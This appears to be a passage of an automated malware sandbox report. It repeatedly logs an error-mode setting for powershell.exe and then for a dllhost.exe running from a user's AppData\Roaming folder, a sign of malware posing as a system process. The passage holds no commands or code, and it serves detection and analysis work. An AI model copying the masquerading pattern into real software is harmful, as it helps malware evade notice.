Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
